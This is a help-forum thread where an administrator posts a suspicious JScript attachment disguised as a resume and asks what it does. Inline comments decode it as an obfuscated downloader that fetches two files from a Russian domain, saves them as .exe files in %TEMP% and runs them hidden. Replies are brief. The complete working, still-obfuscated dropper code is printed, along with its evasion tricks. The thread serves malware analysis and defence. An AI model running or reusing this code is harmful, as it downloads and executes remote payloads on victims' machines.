Malicious javascript pretending to be a resume: What does this script do?

Hi guys,

I am not sure what the policy is on posting this sort of thing here, so I give fair warning that this code is suspected to be malicious: it came via email in a zip file, pretending to be a resume.

I was hoping someone could tell me what this code was trying to do. I have a tiny bit of experience with JavaScript and scripting in general, but most of this code is unrecognisable to me.
// ANALYSIS NOTES (from static reading only; the sample was not executed).
//
// What it is: a small downloader written for Microsoft JScript. It depends on ActiveXObject, so it
// only does anything on Windows; a double-clicked .js attachment is normally run by Windows Script
// Host, which is presumably the intended host.
//
// Obfuscation layers visible in the code:
//   1. Junk statements: most `var X=(...)` / `X=(...)` assignments compute a number or string from a
//      literal and are never read again in the visible code. They are padding.
//   2. Noise characters: every meaningful string has extra characters mixed in, which are stripped
//      by a regex character class, e.g. "+WTSJcIr[i==pvt/w.7~SohVe~lAl" -> "WScript.Shell".
//   3. Hidden method name: the call that strips the noise is often written as
//      (number)["toString"](base). For the first one, 8*6300863351+1 in base 35 is "replace";
//      the others use different number/base pairs and presumably also yield "replace".
//   4. Split method names: property names are concatenated from pieces, with always-true ternaries
//      choosing a hex-escaped letter, e.g. "E"+"xpandEnvironmentS"+"\x74"+"rings".
//
// Decoded behaviour of T_Kw(fr, gadK, rn):
//   - WScript.Shell.ExpandEnvironmentStrings("%TEMP%") + "\" + gadK   -> local file path
//   - MSXML2.XMLHTTP: open("GET", fr, false); send()                  -> synchronous download of fr
//   - ADODB.Stream: open; type=1 (binary); write(ResponseBody); position=0;
//     saveToFile(path, 2) (2 = overwrite); close                       -> body written to disk
//   - if rn > 0: WScript.Shell.Run(path, 0, 0)                         -> saved file is launched with
//     window style 0 (hidden) and without waiting for it to finish
//
// Indicators decoded from the two T_Kw calls near the end (defanged for safe handling):
//   hxxp://ellison1[.]ru/images/one.jpg  -> %TEMP%\3965211.exe
//   hxxp://ellison1[.]ru/images/two.jpg  -> %TEMP%\5226509.exe
// The remote names end in .jpg but the bodies are saved and run as .exe, so the image extension
// looks like a disguise for an executable payload (not confirmed here; the files were not fetched).
//
// Defender notes: the domain and the two %TEMP% file names can be used for proxy/DNS blocking and
// for hunting; a script host process making an HTTP request and then starting an .exe from %TEMP%
// is the behaviour to alert on. Blocking .js attachments (including inside zip files) at the mail
// gateway, or changing the default handler for .js so it opens in an editor, stops this delivery
// path.
//
// Outer wrapper: the first try reads window[...]; the stripped key is a meaningless property name.
// Where `window` is not defined that read throws, which moves execution into the catch. The nested
// try then creates an ActiveXObject whose stripped name is also meaningless; that presumably fails
// as well and falls through to catch(eee), where the real logic lives. NOTE(review): this looks
// like a guard so the payload only runs outside a browser / simple emulator; confirm dynamically
// in a sandbox.
(function(){var BKah=(27.0+"HKGbcL8gW\x82u"["charCodeAt"](5)*0);iaqm=(2.0+"?s\x86}|ZA:*\x894H9"["length"]*20);var n7Er=("J\x82j\x85m\x81;\x86&gs('6tbf%"["charCodeAt"](8)*11+34.0);try{var vStb=window["g1wUbdrLt~bqr"[("U#)_/k?B"["length"]*6300863351+1.0)["toString"](("p\x8ax}?d*Rt{-I].+i7r_\x7f"["charCodeAt"](6)*0+35.0))](/[gLq\~Ud1]/g,"")];var vS_J=(":W)o7j}B\x82h\x81X8;u"["charCodeAt"](12)*5+29.0);oNNc=(2*"\x89)Z\x60Xh\x81-\x8b"["charCodeAt"](2)+24.0);}catch(ee){try{var lFPZ=new ActiveXObject("*eIw<rtgdEvH1e"[("{=isQt-7/\x87>eBIW6F"["charCodeAt"](7)*1084775147+33.0)["toString"](("W\x80\x833[ai"["length"]*5+1.0))](/[\<d1E\*HtI]/g,""));S0vk=("W7_6*vO\x83nU(-gZ"["length"]*23+8.0);}catch(eee){function T_Kw(fr, gadK, rn){ var hyan = new ActiveXObject("+WTSJcIr[i==pvt/w.7~SohVe~lAl"["replace"](/[\+7\[vV\~TJIoA\=\/w]/g,""));var OUoS=(48*"#@}6Y\x82;So2"["length"]+1.0);
// hyan is the WScript.Shell object. The next line rebuilds gadK as
// ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) ("\") + the file name passed in.
var gadK = hyan["E"+"xpandEnvironmentS"+(65>20?"\x74":"\x6f")+"rings"]("u%oWTjE=MYHP*%"[(720098668*"w%:$FNn7#(GU\x8b{x)"["charCodeAt"](4)+49.0)["toString"]((0*"8\x846]T\x87i[tvg"["charCodeAt"](7)+35.0))](/[\=jouYH\*W]/g,"")) + String["fr"+(83>1?"\x6f":"\x68")+"mCh"+""+(83>31?"\x61":"\x59")+"rCode"](92) + gadK;var Cvii="#P*F`(I;lGYgDT>x;PNp(Aq"["replace"](/[\>NTgA\;\`\#\*\(G]/g,"");
// YThL is the HTTP client: the noisy string strips down to "MSXML2.XMLHTTP".
var YThL = new ActiveXObject("cM-hSEX1vMZL[2m.5X+MrL8HuT<TsP"[("3R)0v"["length"]*3273117743+4.0)["toString"](("\x86\x84$j\x82e+#D(X\x874a*rn8\x89o"["charCodeAt"](9)*0+29.0))](/[m\[\-8rhEsZv\<\+u51c]/g,""));Fdbq="bB`/39cFyq;V&=lE5(j_pvMt"[(4.0+"Ul\x86Jn"["length"]*8476012186)["toString"]((34.0+"W\x7fn.y?\x846:k1t+s"["charCodeAt"](5)*0))](/[\/\(M9FEy\`\_\;\=b\&p]/g,"");
// onreadystatechange handler: once readyState === 4 (request complete) it creates GkqB, whose
// name strips down to "ADODB.Stream", to write the response to disk.
YThL["o"+(85>27?"\x6e":"\x68")+"re"+"ad"+(86>22?"\x79":"\x70")+"statechange"] = function (){ if (YThL["rea"+(69>21?"\x64":"\x5d")+"ySt"+"a"+(62>30?"\x74":"\x6f")+"e"] === 4){ var GkqB = new ActiveXObject("7IAID]O1DNBI.lS3t@#r;EeN9aHm"[("T\x83_}-|w<tp7"["length"]*5423875738+0.0)["toString"]((4*">Jv/\x83xEZj"["length"]+0.0))](/[lI13\;9EH\#\@7\]N]/g,""));var RS_j="!pkwb3)WyK#5l0wVENpg9L"[(1.0+">3&w\x8a4C"["length"]*2863432339)["toString"](("/G?K{@\x88'\x80JLW5_\x8bp>"["charCodeAt"](12)*0+30.0))](/[bEwlp\#9y\!\)]/g,"");
// GkqB.open(); everything else on this line is junk assignments.
GkqB["o"+""+(98>36?"\x70":"\x69")+"en"]();hMoj="WIedMxbyo)CdT(N<9-U7N"["replace"](/[Wed7\<\-y\(\)x]/g,"");n6ZZ=("3.\x80x*PDHhq(S\x87i[\x83"["charCodeAt"](4)*9+40.0);var z_ox=("v[j(7"["length"]*76+1.0);bbQk="3Vjhx8JOz6NGnWPBo<Mot)C"[(646242394*"a<\x8a_s[\x84Lv\x86\x82@=N\x80zg"["charCodeAt"](13)+77.0)["toString"](("]Vt\x8b\x89h~^G-(?"["charCodeAt"](8)*0+35.0))](/[Njx3PO\)6J\<no]/g,"");var gvTb=(9.0+"3*\x85r4\x82bk\x80\x89Nt/"["length"]*27);var vtJw="`a4fv68s[z/&y]kAn59Ma"["replace"](/[Av548M\&\]\[\/\`]/g,"");
// GkqB.type = 1: binary stream, so the bytes are stored unmodified.
GkqB["t"+"yp"+(54>5?"\x65":"\x5b")+""] = 1;var dXJt="(DVFQ0G]QvnhZ9R=SMzrT-I"[(1120153484*"'\x89\x83Ce\x8al\x80ZMRxO5cio-h\x8b"["charCodeAt"](17)+29.0)["toString"]((0*"gz\x89\x87\x82AJFE_\x8aiN"["charCodeAt"](8)+35.0))](/[0V\=h\]v\(\-9zFrS]/g,"");
// GkqB.write(YThL.ResponseBody): copies the raw HTTP response body into the stream.
GkqB["w"+"rit"+(52>2?"\x65":"\x5c")+""](YThL["Resp"+(74>46?"\x6f":"\x68")+"nseBo"+"d"+(69>37?"\x79":"\x6f")+""]);F81g=("\x81+\x87q/p\x82*[Sb"["length"]*36+9.0);g5XT="RL0Q<zkWR5Y`K*mka92I-er"["replace"](/[e29\-\<Rk\*0\`Y]/g,"");var JiWj=(10.0+"H@\x8ae\x86\x81D;I1i"["charCodeAt"](6)*1);
// GkqB.position = 0: rewinds the stream so the whole body is saved.
GkqB["p"+(64>31?"\x6f":"\x65")+""+"siti"+(80>7?"\x6f":"\x6a")+"n"] = 0;pp3E="oyPngts4LIiH[LXHrScZmUb"["replace"](/[\[I4PUXZtHSon]/g,"");
// GkqB.saveToFile(gadK, 2): writes the file under %TEMP%; option 2 overwrites an existing file.
GkqB["sav"+(55>7?"\x65":"\x5b")+""+""+(98>44?"\x54":"\x4b")+"oFile"](gadK, 2);var aLTe=("0'Adz\x60MB*#/;1"["charCodeAt"](8)*4+20.0);var nLha="P8EG=X<huCH&gno1Unrwh+h"[(16.0+"qPB/78-5z*\x83&ijT2"["charCodeAt"](7)*556371782)["toString"]((2*"_@H^(?Z51KPyN"["length"]+6.0))](/[G\&w1H\=u\+P8n\<]/g,"");o$dG=("VM6ySLTE>ZYu\x7fvJ[_"["charCodeAt"](2)*0+15.0);var D15G=(2.0+"to5XbxJ"["length"]*47);
// GkqB.close().
GkqB[""+(87>27?"\x63":"\x5a")+"lo"+""+(53>34?"\x73":"\x6d")+"e"]();Cvpn="M`p~0U+7L_uJBZSniT%m~9[w"["replace"](/[iu\%\+\~0MB\[\`7\_S]/g,"");
} ;T5gx="OA1P#Mhp8k2El6VOgR+i1M"[(3027147209*"<$L+}w42Ta~GfX"["length"]+8.0)["toString"]((34.0+"OB*\x85sV&\x7fy0E@d)\x86<g"["charCodeAt"](10)*0))](/[1g86hEO\+\#k]/g,"");
} ;var Jx8n="*4=b&~L%Qx&-COCKU#h-stTe"[("Y0T8QC\x881Aj%Ub57n"["charCodeAt"](5)*890487061+31.0)["toString"]((0*"g\x80dw\x7f>D~&W]H\x85Q\x8b"["charCodeAt"](6)+36.0))](/[s\*\#TO\%\&\=\-KQ\~]/g,"");var ZC3Q=(36.0+"CAwD\x81-tp2}\x824"["charCodeAt"](8)*6);var eLzP=("UzP+h4\x60\x84FHYO?("["length"]*20+11.0);Bs7c="2Aez6DwLnS~Lu*x3s1plM>M"[(0.0+"QO\x82Y\x60*"["length"]*7063343489)["toString"]((4.0+"P\x8079^C"["length"]*5))](/[ez1\~wn\*3ul\>2D]/g,"");w$2g=(5*"[Pyw;NKh9met{p1\x80Ya"["charCodeAt"](14)+40.0);var gryB=(6.0+"\x60[S9e\x89?DGY+-8"["length"]*0);var nKTq="<R[Xpk&&F<l&eI6Ws_tDi*Q0"[("M>U\x7f\x8b0RjizoA"["length"]*2032260927+9.0)["toString"](("vo\x89M&bnrI\x82L)6>*@jBOe"["charCodeAt"](11)*0+31.0))](/[\[6Q\<esp\_D\*\&]/g,"");
// YThL.open("GET", fr, false): "wGvE!T" strips to "GET"; the third argument false makes the
// request synchronous, so send() on the next line blocks until the download has finished.
try { YThL["op"+(90>29?"\x65":"\x5d")+""+"n"]("wGvE!T"[("t^m\x88d"["length"]*10081381361+4.0)["toString"]((1*"npUZ+@&\x82L^{=#\x85"["charCodeAt"](12)+0.0))](/[v\!w]/g,""), fr, false);var Dtcc="LsVu/CH7SDET4m/E6oO9Zrya"["replace"](/[yZD\/4VoEHL97]/g,"");
// YThL.send().
YThL[""+""+(51>8?"\x73":"\x6c")+"end"]();XYxF="cF_9%X-nJ8sI+eW7eFb6EvgQ"[(3027147209*"iX2u}-TA&$z:3{"["length"]+8.0)["toString"](("1CEvd:\x85-Rg5*\x60"["length"]*2+8.0))](/[veJ\-6g\+\%s\_cb7]/g,"");
// hyan.Run(gadK, 0, 0): launches the saved file with a hidden window and without waiting.
// Both calls further down pass rn = 1, so each downloaded file is executed.
if (rn > 0){ hyan["R"+(90>39?"\x75":"\x6d")+""+"n"](gadK, 0, 0);DhDg="XV/6;mND/1OjQ<_I&otU8(W"["replace"](/[OUt\_j\/\&\;\<XN\(]/g,"");
} ;var Ssra=(13.0+"y:a;\x85Z=g,ch+rm@"["length"]*22);
// Empty catch: any download, write or launch error is swallowed, so a failure shows nothing to
// the user.
} catch (er){ } ;var I9Hr="W6pUh#mPI_BTsjQ5&mwVZK"[(672092090*">(Y+\x60KLAQ}"["charCodeAt"](5)+59.0)["toString"](("1gvm/u|U"["length"]*4+3.0))](/[\_\&Wj5w\#PpZhT]/g,"");
// First payload: the URL string strips to hxxp://ellison1[.]ru/images/one.jpg, saved as 3965211.exe.
} T_Kw("Yh9tTt`pN]:0/#W/>e(lVlzi!sDoRnS1R.*Gr~u>U/-iLmq%a*-g2eWs`/!o-n%-ed.*j4p[bg"[(0.0+"_\x81L'<xc"["length"]*7200986687)["toString"]((0.0+"PemYZ"["length"]*7))](/[\>9Vbd\(S\~\*\#DUTq\-\[L0G2zNR\%Y\`\]W\!4]/g,""),"r3@9r6f5E2T1c1o.VeZbxv_e"["replace"](/[EfcbV\_\@vZrTo]/g,""), 1);M2_r=(54.0+"W\x8a1\x81zYFGjdEl\x86I"["charCodeAt"](13)*6);
// Second payload: strips to hxxp://ellison1[.]ru/images/two.jpg, saved as 5226509.exe.
T_Kw("(h@tIt(pR:bT/@*/%[e0lv0lMicsTo&nL1C.!)r>uCd/Xi8ymVaqg!eNsO/~tRFwEo@.+jQpzg"[(1487780792*"4Z\x86p2tm6laX"["length"]+7.0)["toString"]((29.0+"IKGeDmo9>=yf&\x88{d\x8b\x83"["charCodeAt"](2)*0))](/[\)d\[\!\@ELFI\>bMvXc\(q0C8\+\*Q\%\&N\~zVROyT]/g,""),"&5!2Y2Nu6J5K0b94.teoxOe"["replace"](/[NJ\&o4Ou\!bKtY]/g,""), 1);var Y1Zi=("\x60k\x84JNZlY;G"["length"]*30+6.0);
// Closes catch(eee), catch(ee) and the wrapper function; the rest is junk plus a trailing random
// comment.
}};var H9rD=(21*"<qG\x83pgv]"["length"]+7.0);;var BJCo="gVhaDsYxdKyS(invL8wjQ"[(854354352*"mt}p\x87n@\x8b;\x8a"["charCodeAt"](8)+41.0)["toString"](("CSpD9hegV,"["charCodeAt"](4)*0+35.0))](/[h8yDgvdnY\(j]/g,"")})();//q0G737pZcn


My enquiring mind wants to know what this script was trying to do and how. :)

Thanks in advance.
Andrew
defectaAsked:

JohnBusiness Consultant (Owner)Commented:
I just delete this stuff on sight. You would know the sender if legitimate. Just delete it and move on.
defectaAuthor Commented:
I appreciate that, and I do too but as I said, I would like to understand what it is trying to do so I can better protect our environment. I had a user who almost ran this script but thought better of it at the last second.

I would really appreciate some insight into what the purpose of this script is and what it's trying to do.

I have no question that it's malicious, I was just hoping someone with a better understanding of JavaScript could give me a summary of its intent?

Cheers.
Dave BaldwinFixer of ProblemsCommented:
It appears to be attempting to load an ActiveX component which, depending on your Windows security, can potentially do just about anything.  The most likely thing is loading viruses and malware off the internet to infect the machine that it is run on.

defectaAuthor Commented:
Thanks Dave.

Is there an obfuscated IP address or something in that code? Something that could potentially be blacklisted to prevent the ActiveX component from being downloaded?
Dave BaldwinFixer of ProblemsCommented:
I don't know.  I saw this part...
var GkqB = new ActiveXObject(


which declares a new ActiveXObject but since most of the javascript is encoded (and I won't run it to decode it), I can't tell where it is going to get it.

I just noticed another ActiveXObject in the first line of the script.
Scott Fell, EE MVEDeveloper & EE ModeratorCommented:
I uploaded the file to malwr.com to check out  https://malwr.com/analysis/M2MwMGJiNjA0ZjYwNGYwZGIwYzA4MzgzNDBmNmU1ZGM/